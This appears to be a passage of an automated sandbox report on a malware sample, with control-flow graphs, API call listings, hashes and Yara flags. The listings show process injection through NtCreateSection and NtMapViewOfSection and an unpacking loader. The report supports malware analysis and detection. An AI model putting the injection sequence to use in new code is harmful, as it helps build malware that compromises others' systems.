                                                                                                                                                                      control_flow_graph 312 401587-4015b2 call 4011cd 316 4015b4 312->316 317 4015b7-4015bc 312->317 316->317 319 4015c2-4015d3 317->319 320 4018df-4018e7 317->320 323 4015d9-401602 319->323 324 4018dd 319->324 320->317 325 4018ec-40193b call 4011cd 320->325 323->324 333 401608-40161f NtDuplicateObject 323->333 324->325 333->324 335 401625-401649 NtCreateSection 333->335 336 4016a5-4016cb NtCreateSection 335->336 337 40164b-40166c NtMapViewOfSection 335->337 336->324 341 4016d1-4016d5 336->341 337->336 339 40166e-40168a NtMapViewOfSection 337->339 339->336 342 40168c-4016a2 339->342 341->324 344 4016db-4016fc NtMapViewOfSection 341->344 342->336 344->324 346 401702-40171e NtMapViewOfSection 344->346 346->324 349 401724 346->349 349->324 350 401724 call 401729 349->350 350->324
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000006.00000002.1658571139.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_egiibgt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                                      • Opcode ID: 1ec31b479fd08731287e8d0e55fe4d339ef2a67852c713b723290c7befe848b2
                                                                                                                                                                      • Instruction ID: c9324331886a871ff7b65cfc1a3adde32c11ca3f72b54674233341407885f4d3
                                                                                                                                                                      • Opcode Fuzzy Hash: 1ec31b479fd08731287e8d0e55fe4d339ef2a67852c713b723290c7befe848b2
                                                                                                                                                                      • Instruction Fuzzy Hash: 7E511A71900249BBEB209F91CC48FEF7BB8EF85B00F144169F911AA2E5D7759945CB24
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00401729 Relevance: 4.7, APIs: 3, Instructions: 179nativeCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 351 401729 352 40172b 351->352 353 40172f-40174d 351->353 352->353 354 40172d 352->354 365 401764 353->365 366 401755-401778 353->366 354->353 356 4016be-4016cb NtCreateSection 354->356 358 4016d1-4016d5 356->358 359 4018dd-40193b call 4011cd 356->359 358->359 361 4016db-4016fc NtMapViewOfSection 358->361 361->359 364 401702-40171e NtMapViewOfSection 361->364 364->359 369 401724 364->369 365->366 377 40177b-4017b8 366->377 369->359 372 401724 call 401729 369->372 372->359 393 4017ba-4017e3 377->393 398 4017e5-4017eb 393->398 399 4017ed 393->399 400 4017f3-4017f9 398->400 399->400 401 401809-40180d 400->401 402 4017fb-401807 400->402 401->400 403 40180f-401814 401->403 402->401 404 401816 call 40181b 403->404 405 40187c-40188b 403->405 407 40188e-401891 405->407 408 401893-40189d 407->408 409 4018bb-4018d4 407->409 410 4018a0-4018a9 408->410 409->359 411 4018b7 410->411 412 4018ab-4018b5 410->412 411->410 413 4018b9 411->413 412->411 413->407
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000006.00000002.1658571139.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_egiibgt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Section$View$Create
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 33071139-0
                                                                                                                                                                      • Opcode ID: b6b7661ceeaa473891237c732f5305db374e8f07cd43916073c5c2763a81e662
                                                                                                                                                                      • Instruction ID: bb29a515743844fa426f6922f48e3936f90c9c278b9ffb8c9c9d974ad6050a99
                                                                                                                                                                      • Opcode Fuzzy Hash: b6b7661ceeaa473891237c732f5305db374e8f07cd43916073c5c2763a81e662
                                                                                                                                                                      • Instruction Fuzzy Hash: 69519272904104EBEB249A55CC44FAA77B5FF85700F24813BE842772F0D67C6942E65B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004205D0 Relevance: 24.7, APIs: 3, Strings: 11, Instructions: 233librarymemoryloaderCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 0 4205d0-420e7c LoadLibraryW GetProcAddress VirtualProtect
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryW.KERNEL32(00432B28,0BB7EA7B,4BBE82DD,2FC43CC7,52860AB1,6AD71B2C,43FE4454,34026A25), ref: 00420E48
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,0042A3E0), ref: 00420E54
                                                                                                                                                                      • VirtualProtect.KERNELBASE(00430A2C,00432EAC,00000040,?), ref: 00420E74
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000006.00000002.1658606089.0000000000413000.00000020.00000001.01000000.00000005.sdmp, Offset: 00413000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_6_2_413000_egiibgt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressLibraryLoadProcProtectVirtual
                                                                                                                                                                      • String ID: )?u$:/X$F(+$O8##$R'._$U99x$X2R$dFfX$v;^:$o:?$6
                                                                                                                                                                      • API String ID: 3509694964-975362989
                                                                                                                                                                      • Opcode ID: 6ddae236ef9050d404d5ee3ef1b8c205b4b68fcdbf2e0cd4556e9ec628b5341b
                                                                                                                                                                      • Instruction ID: b888287569ae84761c73a855bed93743e283a704e3e46ab774050eddf2396468
                                                                                                                                                                      • Opcode Fuzzy Hash: 6ddae236ef9050d404d5ee3ef1b8c205b4b68fcdbf2e0cd4556e9ec628b5341b
                                                                                                                                                                      • Instruction Fuzzy Hash: 7502A6B410E385CBD2B49F469689B8EBBF0BB91704F608E0CD6DD1A224CB754589CF97
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 001F003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1 1f003c-1f0047 2 1f004c-1f0263 call 1f0a3f call 1f0e0f call 1f0d90 VirtualAlloc 1->2 3 1f0049 1->3 18 1f028b-1f0292 2->18 19 1f0265-1f0289 call 1f0a69 2->19 3->2 21 1f02a1-1f02b0 18->21 23 1f02ce-1f03c2 VirtualProtect call 1f0cce call 1f0ce7 19->23 21->23 24 1f02b2-1f02cc 21->24 30 1f03d1-1f03e0 23->30 24->21 31 1f0439-1f04b8 VirtualFree 30->31 32 1f03e2-1f0437 call 1f0ce7 30->32 34 1f04be-1f04cd 31->34 35 1f05f4-1f05fe 31->35 32->30 37 1f04d3-1f04dd 34->37 38 1f077f-1f0789 35->38 39 1f0604-1f060d 35->39 37->35 41 1f04e3-1f0505 37->41 42 1f078b-1f07a3 38->42 43 1f07a6-1f07b0 38->43 39->38 44 1f0613-1f0637 39->44 52 1f0517-1f0520 41->52 53 1f0507-1f0515 41->53 42->43 45 1f086e-1f08be LoadLibraryA 43->45 46 1f07b6-1f07cb 43->46 47 1f063e-1f0648 44->47 51 1f08c7-1f08f9 45->51 49 1f07d2-1f07d5 46->49 47->38 50 1f064e-1f065a 47->50 54 1f07d7-1f07e0 49->54 55 1f0824-1f0833 49->55 50->38 56 1f0660-1f066a 50->56 59 1f08fb-1f0901 51->59 60 1f0902-1f091d 51->60 61 1f0526-1f0547 52->61 53->61 62 1f07e4-1f0822 54->62 63 1f07e2 54->63 58 1f0839-1f083c 55->58 57 1f067a-1f0689 56->57 64 1f068f-1f06b2 57->64 65 1f0750-1f077a 57->65 58->45 66 1f083e-1f0847 58->66 59->60 67 1f054d-1f0550 61->67 62->49 63->55 68 1f06ef-1f06fc 64->68 69 1f06b4-1f06ed 64->69 65->47 70 1f084b-1f086c 66->70 71 1f0849 66->71 73 1f0556-1f056b 67->73 74 1f05e0-1f05ef 67->74 77 1f06fe-1f0748 68->77 78 1f074b 68->78 69->68 70->58 71->45 75 1f056f-1f057a 73->75 76 1f056d 73->76 74->37 79 1f057c-1f0599 75->79 80 1f059b-1f05bb 75->80 76->74 77->78 78->57 85 1f05bd-1f05db 79->85 80->85 85->67
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 001F024D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000006.00000002.1658547253.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1f0000_egiibgt.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID: cess$kernel32.dll
                                                                                                                                                                      • API String ID: 4275171209-1230238691
                                                                                                                                                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                      • Instruction ID: 8ec4a7bdf53c5b95cfdf35a861455de8e6bc33b14d16b850f7662a393963fbf9
                                                                                                                                                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                      • Instruction Fuzzy Hash: 0D526974A01229DFDB65CF58C984BA8BBB1BF09304F1580D9E94DAB352DB30AE85DF14
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 007B0761 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 414 7b0761-7b077a 415 7b077c-7b077e 414->415 416 7b0780 415->416 417 7b0785-7b0791 CreateToolhelp32Snapshot 415->417 416->417 418 7b0793-7b0799 417->418 419 7b07a1-7b07ae Module32First 417->419 418->419 424 7b079b-7b079f 418->424 420 7b07b0-7b07b1 call 7b0420 419->420 421 7b07b7-7b07bf 419->421 425 7b07b6 420->425 424->415 424->419 425->421
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007B0789
                                                                                                                                                                      • Module32First.KERNEL32(00000000,00000224), ref: 007B07A9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000006.00000002.1659298227.00000000007AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 007AD000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_6_2_7ad000_egiibgt.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3833638111-0
                                                                                                                                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                      • Instruction ID: 2b2574c8bd33e2ab19e01d009be8da282b45aaa1889ed111c5b21d039594bb88
                                                                                                                                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                      • Instruction Fuzzy Hash: 5CF068311007156BDB202AB5988DBABB6E8AF49764F100528E682910C0DAB4FC454A91
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 001F0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 427 1f0e0f-1f0e24 SetErrorMode * 2 428 1f0e2b-1f0e2c 427->428 429 1f0e26 427->429 429->428
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetErrorMode.KERNELBASE(00000400,?,?,001F0223,?,?), ref: 001F0E19
                                                                                                                                                                      • SetErrorMode.KERNELBASE(00000000,?,?,001F0223,?,?), ref: 001F0E1E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000006.00000002.1658547253.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1f0000_egiibgt.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                      • Instruction ID: e42ae791f01396f898893d9b916e06553859c346632d715855d870cce6d42db5
                                                                                                                                                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                      • Instruction Fuzzy Hash: 90D0123154512CB7D7012A94DC09BDD7B1CDF09B62F008411FB0DD9081C770994046E5
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00420E80 Relevance: 1.5, APIs: 1, Instructions: 9libraryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 430 420e80-420eb6 LoadLibraryA
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryA.KERNELBASE(0042ECB8,004213D3), ref: 00420EB0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000006.00000002.1658606089.0000000000413000.00000020.00000001.01000000.00000005.sdmp, Offset: 00413000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_6_2_413000_egiibgt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                                      • Opcode ID: 3193188a67bfd05105940a1f3b4ac3fb378d0a95354f5de457203bb2f1935f83
                                                                                                                                                                      • Instruction ID: 0676769115eb9f49202f6ab6b86a943d872ee6c77840cf1f180e8257c2dd3152
                                                                                                                                                                      • Opcode Fuzzy Hash: 3193188a67bfd05105940a1f3b4ac3fb378d0a95354f5de457203bb2f1935f83
                                                                                                                                                                      • Instruction Fuzzy Hash: C0D0C97474D390CDDB618F97BE097083E61AB11704BC0506DD0506A3B2CFB8000ACB5D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040193E Relevance: 1.3, APIs: 1, Instructions: 63sleepCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 431 40193e-401947 432 40195e 431->432 433 40194f-40195a 431->433 432->433 434 401961-4019ae call 4011cd Sleep call 401452 432->434 433->434 445 4019b0-4019b8 call 401553 434->445 446 4019bd-401a03 call 4011cd 434->446 445->446
                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000006.00000002.1658571139.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_egiibgt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                                      • Opcode ID: 71f746a8505fe108ed8da4cdd9973d259565c9a68103dfaed9332816d2b6fe75
                                                                                                                                                                      • Instruction ID: 4db8ba0b08380255fc5aa34ea3e13561f838480f888933e927f1079a64c57490
                                                                                                                                                                      • Opcode Fuzzy Hash: 71f746a8505fe108ed8da4cdd9973d259565c9a68103dfaed9332816d2b6fe75
                                                                                                                                                                      • Instruction Fuzzy Hash: 9A11CEF120C208FBEB006A959D62E7A3268AB40714F304137BA43790F1D57E8923F76B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040194A Relevance: 1.3, APIs: 1, Instructions: 57sleepCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 460 40194a-4019ae call 4011cd Sleep call 401452 473 4019b0-4019b8 call 401553 460->473 474 4019bd-401a03 call 4011cd 460->474 473->474
                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000006.00000002.1658571139.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_egiibgt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                                      • Opcode ID: da38201a32f90b98934b488a65b371e434f1df0c2a04d29242935d2455de016b
                                                                                                                                                                      • Instruction ID: 0371ecd990254dd767a604aa567081474727263e4e3774a05daf7e54a603023c
                                                                                                                                                                      • Opcode Fuzzy Hash: da38201a32f90b98934b488a65b371e434f1df0c2a04d29242935d2455de016b
                                                                                                                                                                      • Instruction Fuzzy Hash: A901A1B120C204EBDB009A95DD62E7A3364AB40314F30453BBA437A1F1C67D9913E72B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040195C Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 488 40195c-4019ae call 4011cd Sleep call 401452 500 4019b0-4019b8 call 401553 488->500 501 4019bd-401a03 call 4011cd 488->501 500->501
                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000006.00000002.1658571139.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_egiibgt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                                      • Opcode ID: 5e3dbe5dd20a4fb5b92f76c9b13fda5f390ba4e8200e1751a23b03b4d52e4fb4
                                                                                                                                                                      • Instruction ID: 3b2e7dc224df146109f963d95c0ead7a9e1b698bafe8296883a7ac19869aede1
                                                                                                                                                                      • Opcode Fuzzy Hash: 5e3dbe5dd20a4fb5b92f76c9b13fda5f390ba4e8200e1751a23b03b4d52e4fb4
                                                                                                                                                                      • Instruction Fuzzy Hash: BA0171B5208204EADB006AD5DD71E7A3269AB44314F304537BA43791F1D57D8912F72B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00401973 Relevance: 1.3, APIs: 1, Instructions: 51sleepCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000006.00000002.1658571139.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_egiibgt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                                      • Opcode ID: acb1fae293eb73a10805bbdd55e216ebbc49928181db8483aeacc3243d44ee5b
                                                                                                                                                                      • Instruction ID: 4b03b50232763afd30ab0c608f125a1a80ed78bb00471cf4ed55e3bed959d7b6
                                                                                                                                                                      • Opcode Fuzzy Hash: acb1fae293eb73a10805bbdd55e216ebbc49928181db8483aeacc3243d44ee5b
                                                                                                                                                                      • Instruction Fuzzy Hash: F80184B5208204EBDB006AD5DD71EBA3269AB44354F304537BA43790F1C57D8912F72B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00401964 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000006.00000002.1658571139.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_egiibgt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                                      • Opcode ID: e5353c19dd0b10c2d892503bd00f36fba5e3f507ee708bcba0cfbdc82fbef293
                                                                                                                                                                      • Instruction ID: f592bab324d3cd5d6286c78059ef0a1e8702b22de7bd53a4ec4d5e19e7ef6e8c
                                                                                                                                                                      • Opcode Fuzzy Hash: e5353c19dd0b10c2d892503bd00f36fba5e3f507ee708bcba0cfbdc82fbef293
                                                                                                                                                                      • Instruction Fuzzy Hash: 0D0184B5208204EBDB006AC5DD62EBA3265AB44314F204537FA43791F1C57D8912F72B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 007B0420 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 007B0471
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000006.00000002.1659298227.00000000007AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 007AD000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_6_2_7ad000_egiibgt.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                      • Instruction ID: 0eb5fc08ac3f0890d47e1af475fa405e1e86a6f68ca886e61ea4b0a102d455a0
                                                                                                                                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                      • Instruction Fuzzy Hash: E3113C79A00208EFDB01DF98C989E99BBF5EF08351F058094FA489B362D775EA50DF90
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00401987 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000006.00000002.1658571139.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_egiibgt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                                      • Opcode ID: 74fb996ba95ec06bb2abe22af5600ab9efc13f551b73dbf86f34961914988ff4
                                                                                                                                                                      • Instruction ID: 68c2b1bb8267a16b47d2b790190fa602822f098e0b694be4ddc2e306b3be1968
                                                                                                                                                                      • Opcode Fuzzy Hash: 74fb996ba95ec06bb2abe22af5600ab9efc13f551b73dbf86f34961914988ff4
                                                                                                                                                                      • Instruction Fuzzy Hash: 2AF086B5208204FADB006BD59D61EBA3768AB44354F204137BA13790F1C57D8912F72B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040197A Relevance: 1.3, APIs: 1, Instructions: 45sleepCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
